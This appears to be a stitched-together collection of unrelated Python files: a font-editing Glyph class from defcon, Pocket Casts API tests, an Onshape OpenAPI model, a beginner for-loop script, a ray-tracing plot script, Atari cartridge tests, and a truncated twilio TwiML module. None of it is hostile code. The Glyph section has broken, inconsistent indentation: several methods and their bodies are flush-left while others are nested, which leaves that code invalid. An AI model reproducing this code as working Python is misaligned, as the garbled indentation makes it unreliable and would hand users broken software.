        identifiers.add(anchor.identifier)
    anchor.glyph = self
    anchor.beginSelfNotificationObservation()
    self.beginSelfAnchorNotificationObservation(anchor)
    self._anchors.insert(index, anchor)
    self.postNotification(notification="Glyph.AnchorsChanged")
    self.dirty = True
def removeAnchor(self, anchor):
    """
    Remove **anchor** from the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.postNotification(notification="Glyph.AnchorWillBeDeleted", data=dict(object=anchor))
    # Release the anchor's identifier for reuse.
    if anchor.identifier is not None:
        self._identifiers.remove(anchor.identifier)
    self._anchors.remove(anchor)
    self.endSelfAnchorNotificationObservation(anchor)
    self.postNotification(notification="Glyph.AnchorsChanged")
    self.dirty = True
def anchorIndex(self, anchor):
    """Return the position of **anchor** within the glyph."""
    return self._anchors.index(anchor)
def clearAnchors(self):
    """Remove every anchor from the glyph (posts *Glyph.Changed*)."""
    self.holdNotifications(note="Requested by Glyph.clearAnchors.")
    for anchor in list(self._anchors)[::-1]:
        self.removeAnchor(anchor)
    self.releaseHeldNotifications()
# ----------
# Guidelines
# ----------
def _get_guidelineClass(self):
    # Class used when instantiating new guidelines.
    return self._guidelineClass

guidelineClass = property(_get_guidelineClass, doc="The class used for guidelines.")

def _get_guidelines(self):
    # Return a copy so callers cannot mutate the internal list.
    return list(self._guidelines)

def _set_guidelines(self, value):
    # Replace all guidelines, batching the resulting notifications.
    self.clearGuidelines()
    self.holdNotifications(note="Requested by Glyph._set_guidelines.")
    for guideline in value:
        self.appendGuideline(guideline)
    self.releaseHeldNotifications()

guidelines = property(_get_guidelines, _set_guidelines, doc="An ordered list of :class:`Guideline` objects stored in the glyph. Setting this will post a *Glyph.Changed* notification along with any notifications posted by the :py:meth:`Glyph.appendGuideline` and :py:meth:`Glyph.clearGuidelines` methods.")
def instantiateGuideline(self, guidelineDict=None):
    """Create a new guideline of this glyph's guideline class, optionally from a dict."""
    return self._guidelineClass(guidelineDict=guidelineDict)
def beginSelfGuidelineNotificationObservation(self, guideline):
    """Subscribe this glyph to the guideline's change notifications."""
    if guideline.dispatcher is not None:
        guideline.addObserver(observer=self, methodName="_guidelineChanged", notification="Guideline.Changed")

def endSelfGuidelineNotificationObservation(self, guideline):
    """Unsubscribe from the guideline and tear down its own observation."""
    if guideline.dispatcher is not None:
        guideline.removeObserver(observer=self, notification="Guideline.Changed")
        guideline.endSelfNotificationObservation()
def appendGuideline(self, guideline):
    """
    Add **guideline** at the end of the glyph's guideline list. The
    guideline must be a defcon :class:`Guideline` (or subclass) and its
    identifier must not clash with identifiers already in the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.insertGuideline(len(self._guidelines), guideline)
def insertGuideline(self, index, guideline):
    """
    Insert **guideline** into the glyph at index. The guideline
    must be a defcon :class:`Guideline` object or a subclass
    of that object. An error will be raised if the guideline's
    identifier conflicts with any of the identifiers within
    the glyph.
    This will post a *Glyph.Changed* notification.
    """
    assert id(guideline) not in [id(guide) for guide in self.guidelines]
    self.postNotification(notification="Glyph.GuidelineWillBeAdded")
    # Convert dicts (or foreign guideline types) to this glyph's class.
    if not isinstance(guideline, self._guidelineClass):
        guideline = self.instantiateGuideline(guidelineDict=guideline)
    assert guideline.glyph in (self, None), "This guideline belongs to another glyph."
    # Collapsed the duplicated glyph-is-None and identifier checks into
    # one adoption branch, matching insertContour/insertComponent.
    if guideline.glyph is None:
        assert guideline.font is None, "This guideline belongs to a font."
        if guideline.identifier is not None:
            identifiers = self._identifiers
            assert guideline.identifier not in identifiers
            identifiers.add(guideline.identifier)
        guideline.glyph = self
        guideline.beginSelfNotificationObservation()
    self.beginSelfGuidelineNotificationObservation(guideline)
    self._guidelines.insert(index, guideline)
    self.postNotification(notification="Glyph.GuidelinesChanged")
    self.dirty = True
def removeGuideline(self, guideline):
    """
    Remove **guideline** from the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.postNotification(notification="Glyph.GuidelineWillBeDeleted", data=dict(object=guideline))
    # Release the guideline's identifier for reuse.
    if guideline.identifier is not None:
        self._identifiers.remove(guideline.identifier)
    self._guidelines.remove(guideline)
    self.endSelfGuidelineNotificationObservation(guideline)
    self.postNotification(notification="Glyph.GuidelinesChanged")
    self.dirty = True
def guidelineIndex(self, guideline):
"""
Get the index for **guideline**.
"""
return self._guidelines.index(guideline)
    def clearGuidelines(self):
        """
        Clear all guidelines from the glyph.
        This posts a *Glyph.Changed* notification.
        """
        # Batch the individual removal notifications into one release.
        self.holdNotifications(note="Requested by Glyph.clearGuidelines.")
        # Iterate in reverse because removeGuideline mutates the list;
        # removing from the end keeps the remaining positions valid.
        for guideline in reversed(self._guidelines):
            self.removeGuideline(guideline)
        self.releaseHeldNotifications()
# ----
# Note
# ----
    def _get_note(self):
        # Getter for the ``note`` property.
        return self._note
    def _set_note(self, value):
        # Setter for the ``note`` property. Only non-None values are type
        # checked; None clears the note. Nothing happens (no notification,
        # no dirty flag) when the value is unchanged.
        if value is not None:
            assert isinstance(value, basestring)
        oldValue = self._note
        if oldValue != value:
            self._note = value
            self.postNotification(notification="Glyph.NoteChanged", data=dict(oldValue=oldValue, newValue=value))
            self.dirty = True
    note = property(_get_note, _set_note, doc="An arbitrary note for the glyph. Setting this will post a *Glyph.Changed* notification.")
# ---
# Lib
# ---
    def _get_libClass(self):
        # Getter for the ``libClass`` property.
        return self._libClass
    libClass = property(_get_libClass, doc="The class used for the lib.")
def instantiateLib(self):
lib = self._libClass(
glyph=self
)
return lib
    def _get_lib(self):
        # Lazily create the lib on first access and start observing it.
        if self._lib is None:
            self._lib = self.instantiateLib()
            self.beginSelfLibNotificationObservation()
        return self._lib
    def _set_lib(self, value):
        # Replace the lib's contents in place (keeps the same lib object
        # so existing observers stay attached).
        lib = self.lib
        lib.clear()
        lib.update(value)
        self.dirty = True
    lib = property(_get_lib, _set_lib, doc="The glyph's :class:`Lib` object. Setting this will clear any existing lib data and post a *Glyph.Changed* notification if data was replaced.")
    def beginSelfLibNotificationObservation(self):
        # Subscribe to lib changes; skipped when no dispatcher is wired up.
        if self._lib.dispatcher is None:
            return
        self._lib.addObserver(observer=self, methodName="_libContentChanged", notification="Lib.Changed")
    def endSelfLibNotificationObservation(self):
        # Tear down lib observation; safe to call when the lib was never
        # created or has no dispatcher.
        if self._lib is None:
            return
        if self._lib.dispatcher is None:
            return
        self._lib.removeObserver(observer=self, notification="Lib.Changed")
        self._lib.endSelfNotificationObservation()
# -----
# Image
# -----
    def _get_imageClass(self):
        # Getter for the ``imageClass`` property.
        return self._imageClass
    imageClass = property(_get_imageClass, doc="The class used for the image.")
def instantiateImage(self):
image = self._imageClass(
glyph=self
)
return image
    def _get_image(self):
        # Lazily create the image on first access and start observing it.
        if self._image is None:
            self._image = self.instantiateImage()
            self.beginSelfImageNotificationObservation()
        return self._image
    def _set_image(self, image):
        # removing image
        if image is None:
            if self._image is not None:
                self.postNotification(notification="Glyph.ImageWillBeDeleted")
                self.endSelfImageNotificationObservation()
                self._image = None
                self.postNotification(notification="Glyph.ImageChanged")
                self.dirty = True
        # adding image
        else:
            if self._image is None:
                # create the image object
                i = self.image
            # ``image`` is treated as a dict-like with fileName, the six
            # transformation keys, and optionally color. Only update (and
            # mark dirty) when something actually differs.
            if set(self._image.items()) != set(image.items()):
                self._image.fileName = image["fileName"]
                self._image.transformation = (image["xScale"], image["xyScale"], image["yxScale"], image["yScale"], image["xOffset"], image["yOffset"])
                self._image.color = image.get("color")
                self.postNotification(notification="Glyph.ImageChanged")
                self.dirty = True
    image = property(_get_image, _set_image, doc="The glyph's :class:`Image` object. Setting this posts *Glyph.ImageChanged* and *Glyph.Changed* notifications.")
    def clearImage(self):
        # Convenience wrapper: assigning None removes the image (see the
        # ``image`` property setter).
        self.image = None
    def beginSelfImageNotificationObservation(self):
        # Subscribe to image changes; skipped when no dispatcher is wired up.
        if self._image.dispatcher is None:
            return
        self._image.addObserver(observer=self, methodName="_imageChanged", notification="Image.Changed")
        self._image.addObserver(observer=self, methodName="_imageDataChanged", notification="Image.ImageDataChanged")
    def endSelfImageNotificationObservation(self):
        # Tear down image observation; safe to call when the image was
        # never created or has no dispatcher.
        if self._image is None:
            return
        if self._image.dispatcher is None:
            return
        self._image.removeObserver(observer=self, notification="Image.Changed")
        self._image.removeObserver(observer=self, notification="Image.ImageDataChanged")
        self._image.endSelfNotificationObservation()
# -------------
# List Behavior
# -------------
def __contains__(self, contour):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return contour in self._contours
def __len__(self):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return len(self._contours)
def __iter__(self):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return iter(self._contours)
def __getitem__(self, index):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return self._contours[index]
def _getContourIndex(self, contour):
if self._shallowLoadedContours is not None:
self._fullyLoadShallowLoadedContours()
return self._contours.index(contour)
# ----------------
# Glyph Absorption
# ----------------
    def copyDataFromGlyph(self, glyph):
        """
        Copy data from **glyph**. This copies the following data:
        ==========
        width
        height
        unicodes
        note
        image
        contours
        components
        anchors
        guidelines
        lib
        ==========
        The name attribute is purposefully omitted.
        """
        from copy import deepcopy
        self.width = glyph.width
        self.height = glyph.height
        # Copy the list so later edits to the source don't leak through.
        self.unicodes = list(glyph.unicodes)
        self.note = glyph.note
        # Guidelines and anchors are re-instantiated so this glyph owns
        # fresh objects rather than sharing the source glyph's.
        self.guidelines = [self.instantiateGuideline(g) for g in glyph.guidelines]
        self.anchors = [self.instantiateAnchor(a) for a in glyph.anchors]
        self.image = glyph.image
        # Contours and components are transferred via the point pen protocol.
        pointPen = self.getPointPen()
        glyph.drawPoints(pointPen)
        self.lib = deepcopy(glyph.lib)
# -----
# Clear
# -----
    def clear(self):
        """
        Clear all contours, components, anchors and guidelines from the glyph.
        This posts a *Glyph.Changed* notification.
        """
        # Batch all the individual clear notifications into one release.
        self.holdNotifications(note="Requested by Glyph.clear.")
        self.clearContours()
        self.clearComponents()
        self.clearAnchors()
        self.clearGuidelines()
        self.clearImage()
        self.releaseHeldNotifications()
# ----
# Move
# ----
def move(self, values):
"""
Move all contours, components and anchors in the glyph
by **(x, y)**.
This posts a *Glyph.Changed* notification.
"""
(x, y) = values
for contour in self:
contour.move((x, y))
for component in self._components:
component.move((x, y))
for anchor in self._anchors:
anchor.move((x, y))
# ------------
# Point Inside
# ------------
    def pointInside(self, coordinates, evenOdd=False):
        """
        Returns a boolean indicating if **(x, y)** is in the
        "black" area of the glyph.
        """
        (x, y) = coordinates
        # Imported locally to keep fontTools an optional dependency at
        # module import time.
        from fontTools.pens.pointInsidePen import PointInsidePen
        # glyphSet=None: component resolution is not needed/supported here.
        pen = PointInsidePen(glyphSet=None, testPoint=(x, y), evenOdd=evenOdd)
        self.draw(pen)
        return pen.getResult()
# ----------------------
# Notification Callbacks
# ----------------------
    def endSelfNotificationObservation(self):
        # Detach this glyph and all of its children from the notification
        # dispatcher, then drop the parent references so the glyph can be
        # garbage collected.
        if self.dispatcher is None:
            return
        # Only iterate contours if some are loaded; ``for contour in self``
        # would otherwise trigger a full lazy load just to tear down.
        if self._contours:
            for contour in self:
                self.endSelfContourNotificationObservation(contour)
        for component in self.components:
            self.endSelfComponentNotificationObservation(component)
        for anchor in self.anchors:
            self.endSelfAnchorNotificationObservation(anchor)
        for guideline in self.guidelines:
            self.endSelfGuidelineNotificationObservation(guideline)
        self.endSelfLibNotificationObservation()
        self.endSelfImageNotificationObservation()
        super(Glyph, self).endSelfNotificationObservation()
        self._font = None
        self._layerSet = None
        self._layer = None
    def _imageDataChanged(self, notification):
        # Image.ImageDataChanged callback: relay as a glyph-level change
        # without marking the glyph dirty (the image data lives elsewhere).
        self.postNotification(notification="Glyph.ImageChanged")
        self.postNotification(notification=self.changeNotificationName)
    def _imageChanged(self, notification):
        # Image.Changed callback: relay and mark the glyph dirty.
        self.postNotification(notification="Glyph.ImageChanged")
        self.dirty = True
    def _contourChanged(self, notification):
        # Contour change callback: relay and mark the glyph dirty.
        self.postNotification(notification="Glyph.ContoursChanged")
        self.dirty = True
    def _componentChanged(self, notification):
        # Component change callback: relay and mark the glyph dirty.
        self.postNotification(notification="Glyph.ComponentsChanged")
        self.dirty = True
    def _componentBaseGlyphDataChanged(self, notification):
        # A component's base glyph changed: relay, but don't mark this
        # glyph dirty -- its own stored data did not change.
        self.postNotification(notification="Glyph.ComponentsChanged")
        self.postNotification(notification=self.changeNotificationName)
    def _anchorChanged(self, notification):
        # Anchor change callback: relay and mark the glyph dirty.
        self.postNotification(notification="Glyph.AnchorsChanged")
        self.dirty = True
    def _guidelineChanged(self, notification):
        # Guideline change callback: relay and mark the glyph dirty.
        self.postNotification(notification="Glyph.GuidelinesChanged")
        self.dirty = True
    def _libContentChanged(self, notification):
        # Lib change callback: relay and mark the glyph dirty.
        self.postNotification(notification="Glyph.LibChanged")
        self.dirty = True
# -----------------------------
# Serialization/Deserialization
# -----------------------------
    def getDataForSerialization(self, **kwargs):
        """
        Return a plain-data dict describing the glyph, suitable for
        :meth:`setDataFromSerialization`. Child objects are serialized
        recursively via their own getDataForSerialization methods.
        """
        from functools import partial
        # Three getter flavors: raw attribute, serialized object, and a
        # list of serialized objects.
        simple_get = partial(getattr, self)
        serialize = lambda item: item.getDataForSerialization()
        serialized_get = lambda key: serialize(simple_get(key))
        serialized_list_get = lambda key: [serialize(item) for item in simple_get(key)]
        getters = [
            ('name', simple_get),
            ('unicodes', simple_get),
            ('width', simple_get),
            ('height', simple_get),
            ('note', simple_get),
            ('components', serialized_list_get),
            ('anchors', serialized_list_get),
            ('guidelines', serialized_list_get),
            ('image', serialized_get),
            ('lib', serialized_get)
        ]
        # Contours that were never fully loaded are passed through as-is
        # instead of being loaded just to serialize them.
        if self._shallowLoadedContours is not None:
            getters.append(('_shallowLoadedContours', simple_get))
        else:
            getters.append(('_contours', serialized_list_get))
        return self._serialize(getters, **kwargs)
def setDataFromSerialization(self, data):
from functools import partial
set_attr = partial(setattr, self) # key, data
def set_each(setter, drop_key=False):
_setter = lambda k, v: setter(v) if drop_key else setter
def wrapper(key, data):
for d in data:
_setter(key, d)
return wrapper
def single_init(factory, data):
item = factory()
item.setDataFromSerialization(data)
return item
def list_init(factory, data):
return [single_init(factory, childData) for childData in data]
def init_set(init, factory, setter):
def wrapper(key, data):
setter(key, init(factory, data))
return wrapper
# Clear all contours, components, anchors and guidelines from the glyph.
self.clear()
setters = (
('name', set_attr),
('unicodes', set_attr),
('width', set_attr),
('height', set_attr),
('note', set_attr),
('lib', set_attr),
('_shallowLoadedContours', set_attr),
('_contours', init_set(list_init, self.instantiateContour, set_each(self.appendContour, True))),
('components', init_set(list_init, self.instantiateComponent, set_each(self.appendComponent, True))),
('guidelines', init_set(list_init, self.instantiateGuideline, set_attr)),
('anchors', init_set(list_init, self.instantiateAnchor, set_attr)),
('image', init_set(single_init, self.instantiateImage, set_attr))
)
for key, setter in setters:
if key not in data:
continue
setter(key, data[key])
if __name__ == "__main__":
    # Run the module's doctests when executed directly.
    import doctest
    doctest.testmod()
|
import os
import unittest
import pocketcasts
# Pocket Casts credentials come from the environment so they are never
# committed to source control; both are None when unset.
USERNAME = os.environ.get('POCKETCAST_USER')
PASSWORD = os.environ.get('POCKETCAST_PASSWORD')
class PocketcastTest(unittest.TestCase):
    """Integration tests for the pocketcasts API wrapper.

    These tests hit the live Pocket Casts service, so they require network
    access and valid POCKETCAST_USER / POCKETCAST_PASSWORD environment
    variables.
    """

    pocket = None  # shared, logged-in client; created once in setUpClass

    @classmethod
    def setUpClass(cls):
        # Log in once for the whole class. Previously this ran in the class
        # body, which performed a network round trip merely on import of
        # this module (and made import fail without credentials).
        cls.pocket = pocketcasts.Pocketcasts(USERNAME, PASSWORD)

    def test_invalid_method(self):
        self.assertRaises(Exception, self.pocket._make_req, 'test', method='INVALID')

    def test_invalid_login(self):
        self.assertRaises(Exception, pocketcasts.Pocketcasts, 'test', 'INVALID')

    def test_get_top_charts(self):
        self.pocket.get_top_charts()

    def test_get_featured(self):
        self.pocket.get_featured()

    def test_get_trending(self):
        self.pocket.get_trending()

    def test_get_podcast(self):
        self.pocket.get_podcast('12012c20-0423-012e-f9a0-00163e1b201c')

    def test_get_podcast_episodes(self):
        self.pocket.get_podcast_episodes(self.pocket.get_trending()[0])

    def test_get_episode(self):
        pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
        self.pocket.get_episode(pod, "7b28c700-d4f1-0134-ebdd-4114446340cb")

    def test_get_starred(self):
        self.pocket.get_starred()

    def test_search_podcasts(self):
        self.pocket.search_podcasts('test')

    def test_subscribe_functions(self):
        # Toggle subscription both ways to leave the account unchanged.
        pod = self.pocket.get_podcast("da9bb800-e230-0132-0bd1-059c869cc4eb")
        pod.subscribed = True
        pod.subscribed = False

    def test_get_episode_notes(self):
        self.pocket.get_episode_notes('a35748e0-bb4d-0134-10a8-25324e2a541d')

    def test_get_subscribed_podcasts(self):
        self.pocket.get_subscribed_podcasts()

    def test_get_new_releases(self):
        self.pocket.get_new_releases()

    def test_get_in_progress(self):
        self.pocket.get_in_progress()

    def test_update_playing_status(self):
        pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
        epi = self.pocket.get_podcast_episodes(pod)[-1]
        epi.playing_status = 3

    def test_invalid_update_playing_status(self):
        pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
        epi = self.pocket.get_podcast_episodes(pod)[-1]
        with self.assertRaises(Exception) as context:
            epi.playing_status = 'invalid'
        self.assertTrue('Sorry your update failed.' in context.exception)

    def test_update_played_position(self):
        pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
        epi = self.pocket.get_podcast_episodes(pod)[-1]
        epi.played_up_to = 2

    def test_invalid_played_position(self):
        pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
        epi = self.pocket.get_podcast_episodes(pod)[-1]
        with self.assertRaises(Exception) as context:
            epi.played_up_to = 'invalid'
        self.assertTrue('Sorry your update failed.' in context.exception)

    def test_update_starred(self):
        # Star then unstar to leave the account unchanged.
        pod = self.pocket.get_podcast("12012c20-0423-012e-f9a0-00163e1b201c")
        epi = self.pocket.get_podcast_episodes(pod)[-1]
        epi.starred = True
        epi.starred = False
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
|
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_color_info
except ImportError:
bt_color_info = sys.modules["onshape_client.oas.models.bt_color_info"]
class BTPartAppearanceInfo(ModelNormal):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """

    # This model has no enum-restricted or range/length-validated attributes.
    allowed_values = {}
    validations = {}
    additional_properties_type = None

    @staticmethod
    def openapi_types():
        """
        This must be a class method so a model may have properties that are
        of type self, this ensures that we don't create a cyclic import
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        return {
            "color": (bt_color_info.BTColorInfo,),  # noqa: E501
            "is_generated": (bool,),  # noqa: E501
            "opacity": (int,),  # noqa: E501
        }

    @staticmethod
    def discriminator():
        # No discriminator: this model is not polymorphic.
        return None

    # Maps Python attribute names to their JSON keys in the API payload.
    attribute_map = {
        "color": "color",  # noqa: E501
        "is_generated": "isGenerated",  # noqa: E501
        "opacity": "opacity",  # noqa: E501
    }

    @staticmethod
    def _composed_schemas():
        # Not a composed (allOf/oneOf/anyOf) schema.
        return None

    # Names stored directly on the instance rather than in _data_store.
    required_properties = set(
        [
            "_data_store",
            "_check_type",
            "_from_server",
            "_path_to_item",
            "_configuration",
        ]
    )

    def __init__(
        self,
        _check_type=True,
        _from_server=False,
        _path_to_item=(),
        _configuration=None,
        **kwargs
    ):  # noqa: E501
        """bt_part_appearance_info.BTPartAppearanceInfo - a model defined in OpenAPI
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                will be type checked and a TypeError will be
                raised if the wrong type is input.
                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                drill down to the model in received_data
                when deserializing a response
            _from_server (bool): True if the data is from the server
                False if the data is from the client (default)
            _configuration (Configuration): the instance to use when
                deserializing a file_type parameter.
                If passed, type conversion is attempted
                If omitted no type conversion is done.
            color (bt_color_info.BTColorInfo): [optional] # noqa: E501
            is_generated (bool): [optional] # noqa: E501
            opacity (int): [optional] # noqa: E501
        """
        self._data_store = {}
        self._check_type = _check_type
        self._from_server = _from_server
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        # Model attributes arrive as kwargs; setattr routes them through the
        # generated type-checking machinery in ModelNormal.
        for var_name, var_value in six.iteritems(kwargs):
            if (
                var_name not in self.attribute_map
                and self._configuration is not None
                and self._configuration.discard_unknown_keys
                and self.additional_properties_type is None
            ):
                # discard variable.
                continue
            setattr(self, var_name, var_value)
|
# Teaching script for Python 2 ``for`` loops (uses print statements).
attendees = ['Alison', 'Carolyn', 'Hannah']
# A list is iterated directly; ``person`` is bound to each element in turn.
for person in attendees: #for "name of variable that we're going to use as we go through this list" in "this list"
    print person
#person = 'Alison', print person
#person = 'Carolyn', print person
# range(5) yields 0..4 (in Python 2, range returns a list).
for cow in range(5):
    print cow
print '\n\n\n\n\n'
days_of_week = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
for day in days_of_week:
    print day
# range(1, 5) stops before 5, so this prints weeks 1 through 4.
for week in range(1,5): #[1,2,3,4]
    print "Week {0}".format(week)
print '\n\n\n\n\n'
# NOTE(review): ``months`` is defined but never used below.
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
print '\n\n\n\n\n'
# enumerate() pairs each element with its 0-based index.
for index, day in enumerate(days_of_week): #or, for dog, day in ...
    print "Day {0}: {1}".format(index + 1, day)
|
import Shadow
from matplotlib import pylab as plt
import numpy
# Propagation range along the beam direction (Y), in cm.
ymin = -100.0
ymax = 100.0
ypoints = 101
# NOTE(review): ``in_object_1`` is not defined in this script -- it is
# presumably injected by the surrounding OASYS/ShadowOui workspace; confirm.
beam = in_object_1._beam
# Propagate the (non-lost) rays and collect beam-size statistics vs Y.
tkt = Shadow.ShadowTools.ray_prop(beam,nolost=1,ymin=ymin,ymax=ymax,ypoints=ypoints,xbins=61,zbins=61)
# Figure 1: 2.35*standard-deviation (FWHM for a Gaussian) from moments.
f1 = plt.figure(1)
plt.plot(tkt["y"],2.35*tkt["x_sd"],label="x (tangential)")
plt.plot(tkt["y"],2.35*tkt["x_wsd"],label="x weighted (tangential)")
plt.plot(tkt["y"],2.35*tkt["z_sd"],label="z (sagittal)")
plt.plot(tkt["y"],2.35*tkt["z_wsd"],label="z weighted (sagittal)")
plt.legend()
plt.title("ray_prop")
plt.xlabel("Y [cm]")
plt.ylabel("2.35*SD [cm]")
# Figure 2: FWHM estimated from histograms, when available.
f2 = plt.figure(2)
if tkt["x_fwhm"] is None:
    pass
else:
    plt.plot(tkt["y"],tkt["x_fwhm"],label="x (histo)")
    plt.plot(tkt["y"],tkt["x_wfwhm"],label="x (weighted histo)")
if tkt["z_fwhm"] is None:
    pass
else:
    plt.plot(tkt["y"],tkt["z_fwhm"],label="z (histo)")
    plt.plot(tkt["y"],tkt["z_wfwhm"],label="z (weighted histo)")
plt.legend()
plt.title("ray_prop (from histograms)")
plt.xlabel("Y [cm]")
plt.ylabel("FWHM [cm]")
plt.show()
|
import pytari2600.memory.cartridge as cartridge
import unittest
import pkg_resources
class TestCartridge(unittest.TestCase):
    """Tests for GenericCartridge using the bundled dummy_rom.bin fixture."""
    def test_cartridge(self):
        # ROM-only cartridge (ram mask 0x0): writes must be ignored.
        cart = cartridge.GenericCartridge(pkg_resources.resource_filename(__name__, 'dummy_rom.bin'), 4, 0x1000, 0xFF9, 0x0)
        # Write should do nothing
        cart.write(0,7)
        self.assertEqual(cart.read(0), 0)
        self.assertEqual(cart.read(3), 3)
        # Reads past 2K wrap/mirror back into the ROM data.
        self.assertEqual(cart.read(2048+2), 2)
    def test_ram_cartridge(self):
        # Cartridge with RAM (mask 0x080): writes land in RAM and are read
        # back at the offset address.
        cart = cartridge.GenericCartridge(pkg_resources.resource_filename(__name__, 'dummy_rom.bin'), 4, 0x1000, 0xFF9, 0x080)
        # Write should go to ram.
        cart.write(0,7)
        self.assertEqual(cart.read(0x80), 7)
        cart.write(0,31)
        self.assertEqual(cart.read(0x80), 31)
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
|
"""
Make sure to check out the TwiML overview and tutorial
"""
import xml.etree.ElementTree as ET
class TwimlException(Exception):
    """Raised when invalid TwiML is constructed (bad attribute values or
    illegal verb nesting)."""
    pass
class Verb(object):
    """Twilio basic verb object.

    Base class for all TwiML verbs: stores attributes, an optional text
    body and nested child verbs, and serializes itself to XML. Subclasses
    set :attr:`nestables` to the verb names they may contain.
    """
    GET = "GET"
    POST = "POST"
    nestables = None

    def __init__(self, **kwargs):
        self.name = self.__class__.__name__
        self.body = None
        self.verbs = []
        self.attrs = {}
        if kwargs.get("waitMethod", "GET") not in ["GET", "POST"]:
            raise TwimlException("Invalid waitMethod parameter, "
                                 "must be 'GET' or 'POST'")
        if kwargs.get("method", "GET") not in ["GET", "POST"]:
            raise TwimlException("Invalid method parameter, "
                                 "must be 'GET' or 'POST'")
        for k, v in kwargs.items():
            # "sender" maps to the XML attribute "from" ("from" is a Python
            # keyword, so it can't be passed as a keyword argument).
            if k == "sender":
                k = "from"
            # None means "attribute not set" and is omitted from the XML.
            if v is not None:
                self.attrs[k] = v

    def __str__(self):
        return self.toxml()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        return False

    def toxml(self, xml_declaration=True):
        """
        Return the contents of this verb as an XML string
        :param bool xml_declaration: Include the XML declaration. Defaults to
                                     True
        """
        # Bug fix: this used to call .encode("utf-8") on the serialized
        # document and concatenate it with a unicode literal, which raised
        # UnicodeDecodeError for non-ASCII content on Python 2 and breaks
        # outright on Python 3 (tostring() returns bytes). Decoding instead
        # always yields text.
        xml = ET.tostring(self.xml()).decode("utf-8")
        if xml_declaration:
            return u'<?xml version="1.0" encoding="UTF-8"?>' + xml
        else:
            return xml

    def xml(self):
        """Build and return this verb (and its children) as an
        :class:`ET.Element` tree."""
        el = ET.Element(self.name)
        # Sort attribute names for deterministic output. sorted() replaces
        # the old keys()/.sort() pair, which only worked on Python 2.
        for a in sorted(self.attrs.keys()):
            value = self.attrs[a]
            if isinstance(value, bool):
                # XML booleans are lowercase ("true"/"false").
                el.set(a, str(value).lower())
            else:
                el.set(a, str(value))
        if self.body:
            el.text = self.body
        for verb in self.verbs:
            el.append(verb.xml())
        return el

    def append(self, verb):
        """Nest *verb* inside this verb, if :attr:`nestables` allows it,
        and return it."""
        if not self.nestables or verb.name not in self.nestables:
            raise TwimlException("%s is not nestable inside %s" % \
                (verb.name, self.name))
        self.verbs.append(verb)
        return verb
class Response(Verb):
    """The root <Response> element of a TwiML document."""
    nestables = [
        'Say',
        'Play',
        'Gather',
        'Record',
        'Dial',
        'Redirect',
        'Pause',
        'Hangup',
        'Reject',
        'Sms',
    ]

    def __init__(self, **kwargs):
        """Version: Twilio API version e.g. 2008-08-01 """
        super(Response, self).__init__(**kwargs)

    def say(self, text, **kwargs):
        """Create a :class:`Say` verb, nest it in this response and
        return it."""
        verb = Say(text, **kwargs)
        return self.append(verb)

    def play(self, url, **kwargs):
        """Create a :class:`Play` verb, nest it in this response and
        return it."""
        verb = Play(url, **kwargs)
        return self.append(verb)

    def pause(self, **kwargs):
        """Create a :class:`Pause` verb, nest it in this response and
        return it."""
        verb = Pause(**kwargs)
        return self.append(verb)

    def redirect(self, url=None, **kwargs):
        """Create a :class:`Redirect` verb, nest it in this response and
        return it."""
        verb = Redirect(url, **kwargs)
        return self.append(verb)

    def hangup(self, **kwargs):
        """Create a :class:`Hangup` verb, nest it in this response and
        return it."""
        verb = Hangup(**kwargs)
        return self.append(verb)

    def reject(self, reason=None, **kwargs):
        """Create a :class:`Reject` verb, nest it in this response and
        return it."""
        verb = Reject(reason=reason, **kwargs)
        return self.append(verb)

    def gather(self, **kwargs):
        """Create a :class:`Gather` verb, nest it in this response and
        return it."""
        verb = Gather(**kwargs)
        return self.append(verb)

    def dial(self, number=None, **kwargs):
        """Create a :class:`Dial` verb, nest it in this response and
        return it."""
        verb = Dial(number, **kwargs)
        return self.append(verb)

    def record(self, **kwargs):
        """Create a :class:`Record` verb, nest it in this response and
        return it."""
        verb = Record(**kwargs)
        return self.append(verb)

    def sms(self, msg, **kwargs):
